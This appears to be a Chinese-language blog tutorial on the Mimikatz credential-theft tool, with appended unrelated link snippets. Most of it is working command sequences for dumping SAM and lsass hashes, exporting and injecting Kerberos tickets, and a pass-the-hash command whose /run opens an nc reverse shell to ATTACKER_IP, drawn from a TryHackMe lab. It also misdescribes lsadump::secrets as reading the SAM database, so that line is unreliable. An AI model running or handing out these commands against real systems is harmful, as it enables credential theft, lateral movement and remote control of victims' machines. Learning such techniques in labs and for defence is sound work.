mimikatz
mimikatz
来源:https://github.com/gentilkiwi/mimikatz
Mimikatz 是由法国人 Benjamin Delpy 编写的 Windows 密码提取工具,被评为黑客们使用最多的五个工具之一,同时它也是 Windows 中收集凭证信息最好的工具,被称为 Windows 凭证收集领域的瑞士军刀。
wiki:https://github.com/gentilkiwi/mimikatz/wiki
工具原理
Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。
常见用法
从本地 SAM 中提取 NTLM 哈希
privilege::debug
token::elevate
lsadump::sam
这种方法只允许你从机器上的本地用户获得哈希值。没有域名用户的哈希值可用。
使用命令可查看全部功能的模块
::
调试进程修改运行权限为SYSTEM
请求进程debug特权mimikatz
privilege::debug
privilege:: # 查看privilege的运行模块
token
token::whoami
token::list
token::elevate # 提升
token::revert # 恢复
lsadump
sam
此命令转储安全帐户管理器 ( SAM) 数据库。它包含用户密码的 NTLM,有时还包含 LM 哈希。它可以在两种模式下工作:在线(使用SYSTEM用户或令牌)或离线(使用SYSTEM& SAMhives 或备份)
lsadump::sam
此方法将只允许您从机器上的本地用户那里获取哈希值。没有域用户的哈希值可用。
lsadump::secrets是一个Windows系统安全工具中的命令,用于从SAM数据库中提取密码散列值或明文密码。
具体来说,SAM数据库是Windows系统中存储本地用户账户信息和密码散列值的文件。lsadump::secrets命令可以通过读取SAM数据库文件并解密其中的密码散列值来获取本地用户账户的密码,且在一些特定情况下也能提取出明文密码。
sekurlsa
sekurlsa::msv
此方法将允许您为本地用户和最近登录计算机的任何域用户提取任何 NTLM 哈希。
pth 哈希传递
参数:
/user- 您要模拟的用户名,请记住 Administrator 不是此知名帐户的唯一名称。
/domain- 完全合格的域名 - 没有域或在本地用户/管理员的情况下,使用计算机或服务器名称,workgroup或其他。
/rc4或者/ntlm-可选- 用户密码的 RC4 密钥/NTLM 哈希。
/aes128-可选- 从用户密码和域领域派生的 AES128 密钥。
/aes256-可选- 从用户密码和域领域派生的 AES256 密钥。
/run-可选- 要运行的命令行 - 默认是:cmd拥有一个 shell。
sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"
列出并导出所有会话的 Kerberos 票证
/export-可选- 票据以文件形式导出.kirbi。它们以用户LUID和组号(0= TGS、1= client ticket(?) 和2= TGT)开头
sekurlsa::tickets /export
通过以下命令使用 mimikatz 从内存中获取 Kerberos 加密密钥
sekurlsa::ekeys
kerberos
TGT在当前会话 (或)中注入一个或多个 Kerberos 票证TGS。
kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi
mimikatz的更多相关文章
- Mimikatz 使用Tips
1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurl ...
- 如何防御“神器”Mimikatz窃取系统密码?
Mimikatz是一款能够从Windows中获取内存,并且获取明文密码和NTLM哈希值的神器,本文将介绍如何防御这款软件获取密码. Mimikatz介绍 Mimikatz是一款能够从Windows认证 ...
- mimikatz不反弹读取密码
有些时候无法反弹shell执行mimikatz,虽然可以用procdump导出lsass的内存dump文件,之后本地获取明文密码,但多少有点麻烦,其实mimikatz也支持命令行直接导出 mimika ...
- 利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)
Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可 ...
- 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz
WCE windows身份认证过程 http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html #特例在登陆的目标服务器/系统,有一个w摘要安全 ...
- Mimikatz的使用心得
Mimikatz是一款由法国人编写的轻量级调试工具,但更为人所知的是使用Mimikatz来获取Windows的明文密码. 这个软件的作者博客:http://blog.gentilkiwi.com/mi ...
- Mimikatz 法国神器
0x00 标准模块 Module : standardFull name : Standard moduleDescription : Basic commands (does not require ...
- [转帖]mimikatz 学习
mimikatz mimikatz 2.0 vient de sortir en version alpha binaires : https://github.com/gentilkiwi/mimi ...
- 利用mimikatz破解远程终端凭据,获取服务器密码
测试环境:windows 10 道友们应该碰到过管理在本地保存远程终端的凭据,凭据里躺着诱人的胴体(服务器密码),早已让我们的XX饥渴难耐了.但是,胴体却裹了一身道袍(加密),待老衲操起法器将其宽衣解 ...
- 两步完成利用procdump64+mimikatz获取win用户密码
使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得 ...
随机推荐
- <K, V>型缓存:LRU策略 FIFO策略
<K, V>型缓存:LRU策略 FIFO策略 这两种替换策略都是通过 LinkedHashMap 实现 LinkedHashMap: LinkedHashMap 继承自 HashMap,所 ...
- 解决class path resource [applicationContext.xml] cannot be opened because it does not exist
在学习spring的过程出现class path resource [applicationContext.xml] cannot be opened because it does not exis ...
- 聊天小精灵ChatGPT,好与不好大揭秘!
一.引言 在一个遥远的地球上,有一个名为ChatGPT的魔法盒子,它能够用智慧回答你的问题,解决你的困扰.它是一个聪明的家伙,但和任何家伙一样,有优点也有缺点.现在就让我们一起来探索这个神秘的魔法盒子 ...
- grub 命令使用
命令列表 ubuntu 的 iso 盘内一般有 command.lst 这个文件,里面是 grub 支持的命令 加载字体 ( 方便中文显示 ) grub> loadfont $prefix/fo ...
- css中所有的选择器(包括比较少见的选择器)
jQuery.CSS常用选择器 符号 描述 示例 说明 紧接无符号 相当于"并且"关系 input.k-textbox{ ...} 选出input并且包含k-textbox类的 ...
- Windows服务器高物理内存占用问题排察
我经常在手中拿着一个内存条手链,以彰显我是计算机深入挖掘专家,它就是一个象征,类似摸金符,有它代表你有资格可以探墓了. 同事找到我说:"我们有一台服务器,内存资源持续高位运行,经常浮动在80 ...
- 随机森林n_estimators 学习曲线
随机森林 单颗树与随机森林的的分对比 # 导入包 from sklearn.datasets import load_wine from sklearn.model_selection import ...
- [ElasticSearch]#Search Guard#sgadmin参数说明
sgadmin.sh/sgadmin.bat是Elastic Search的开源安全组件Search Guard内的可执行脚本. 在修改SG组件的用户角色.权限.密码时,需使用到此脚本. 在修改完Se ...
- 33-webpack详细配置output
const { resolve } = require('path') const HtmlWebpackPlugin = require('html-webpack-plugin') module. ...
- 实现异步操作CompletableFuture
多个线程异步操作后统一返回执行结果AtomicReference<RespVo> event = new AtomicReference<>(); AtomicReferenc ...